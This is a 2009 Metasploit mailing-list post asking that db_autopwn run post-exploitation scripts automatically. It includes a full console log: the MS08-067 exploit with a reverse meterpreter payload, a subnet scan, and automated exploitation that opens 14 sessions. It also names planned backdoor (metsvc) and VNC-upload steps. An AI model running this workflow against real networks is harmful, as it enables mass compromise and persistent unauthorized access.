Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Suggestion for db_autopwn

From: David Guimaraes <skysbsb () gmail com>
Date: Mon, 7 Dec 2009 19:30:38 -0200
I don't know if this already exists, but i want to be able to run a
automatic script when i was able to exploit some machine with db_autopwn..
because i have to do this(post-exploitation) manualy after the explotation..

I have a situation with 14 machines/sessions opened after the db_autopwn
runs, and i want to execute a script like this in the 14 sessions.


metsvc (post exploitation bd)
uploadexec -e lv.exe (bind/execute vnc)



Even i setting the AutoRunScript to execute a file with this cmds does not
work.

root@skys-laptop:/pentest/exploits/framework3# ./msfconsole -r

resourcers/lanhouse.cfg

 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v3.4-dev [core:3.4 api:1.0]
+ -- --=[ 458 exploits - 221 auxiliary
+ -- --=[ 262 payloads - 22 encoders - 8 nops
       =[ svn r7744 updated today (2009.12.07)




resource> use exploit/windows/smb/ms08_067_netapi

resource> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource> set LHOST 10.1.1.103
LHOST => 10.1.1.103
resource> set AutoRunScript multiscript -s
/pentest/exploits/framework3/ar.txt
AutoRunScript => multiscript -s /pentest/exploits/framework3/ar.txt
resource> set ExitOnSession false
ExitOnSession => false
resource> db_destroy teste
[*] Deleting teste...
resource> db_create teste
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: teste
resource> db_nmap -n -p 445 10.1.1.2-254 -T5

Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-07 19:08 BRST
...


Nmap done: 253 IP addresses (18 hosts up) scanned in 4.64 seconds

resource> db_autopwn -b -m ms08_067_netapi -p -e

[*] (1/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.19:445...
[*] (2/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.14:445...
[*] (3/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.4:445...
[*] (4/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.11:445...
[*] (5/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.9:445...
[*] Job limit reached, waiting on modules to finish...
[*] Meterpreter session 1 opened (10.1.1.56:50012 -> 10.1.1.19:32145)
[*] Meterpreter session 2 opened (10.1.1.56:54158 -> 10.1.1.11:13307)
[*] Meterpreter session 3 opened (10.1.1.56:44616 -> 10.1.1.4:11042)
[*] Meterpreter session 4 opened (10.1.1.56:40018 -> 10.1.1.14:10421)
[*] (6/16 [4 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.10:445...
[*] Meterpreter session 5 opened (10.1.1.56:57958 -> 10.1.1.9:6209)
[*] (7/16 [5 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.12:445...
[*] (8/16 [5 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.5:445...
[*] Job limit reached, waiting on modules to finish...
[*] (9/16 [5 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.7:445...
[*] (10/16 [5 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.6:445...
[*] Job limit reached, waiting on modules to finish...
[*] Meterpreter session 6 opened (10.1.1.56:54945 -> 10.1.1.5:22232)
[*] (11/16 [6 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.51:445...
[*] Job limit reached, waiting on modules to finish...
[*] Meterpreter session 7 opened (10.1.1.56:36052 -> 10.1.1.6:25321)
[*] Meterpreter session 8 opened (10.1.1.56:47654 -> 10.1.1.10:26463)
[*] Meterpreter session 9 opened (10.1.1.56:58837 -> 10.1.1.7:22313)
[*] (12/16 [9 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.8:445...
[*] (13/16 [9 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.20:445...
[*] Job limit reached, waiting on modules to finish...
[*] Meterpreter session 10 opened (10.1.1.56:44769 -> 10.1.1.12:13791)
[*] (14/16 [10 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.17:445...
[*] Job limit reached, waiting on modules to finish...
[*] (15/16 [10 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.3:445...
[*] (16/16 [10 sessions]): Launching exploit/windows/smb/ms08_067_netapi
against 10.1.1.2:445...
[*] (16/16 [10 sessions]): Waiting on 5 launched modules to finish
execution...
[*] Meterpreter session 11 opened (10.1.1.56:43583 -> 10.1.1.20:7354)
[*] (16/16 [11 sessions]): Waiting on 5 launched modules to finish
execution...
[*] Meterpreter session 12 opened (10.1.1.56:54405 -> 10.1.1.17:6410)
[*] Meterpreter session 13 opened (10.1.1.56:40651 -> 10.1.1.8:8901)
[*] Meterpreter session 14 opened (10.1.1.56:47355 -> 10.1.1.3:21465)
[*] (16/16 [14 sessions]): Waiting on 1 launched modules to finish
execution...

msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  10.1.1.56:50012 -> 10.1.1.19:32145
  2   Meterpreter  10.1.1.56:54158 -> 10.1.1.11:13307
  3   Meterpreter  10.1.1.56:44616 -> 10.1.1.4:11042
  4   Meterpreter  10.1.1.56:40018 -> 10.1.1.14:10421
  5   Meterpreter  10.1.1.56:57958 -> 10.1.1.9:6209
  6   Meterpreter  10.1.1.56:54945 -> 10.1.1.5:22232
  7   Meterpreter  10.1.1.56:36052 -> 10.1.1.6:25321
  8   Meterpreter  10.1.1.56:47654 -> 10.1.1.10:26463
  9   Meterpreter  10.1.1.56:58837 -> 10.1.1.7:22313
  10  Meterpreter  10.1.1.56:44769 -> 10.1.1.12:13791
  11  Meterpreter  10.1.1.56:43583 -> 10.1.1.20:7354
  12  Meterpreter  10.1.1.56:54405 -> 10.1.1.17:6410
  13  Meterpreter  10.1.1.56:40651 -> 10.1.1.8:8901
  14  Meterpreter  10.1.1.56:47355 -> 10.1.1.3:21465



Making db_autopwn execute the AutoRunScript parameter after the success
exploitation will help me alot.

-- 
David Gomes GuimarĂ£es

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: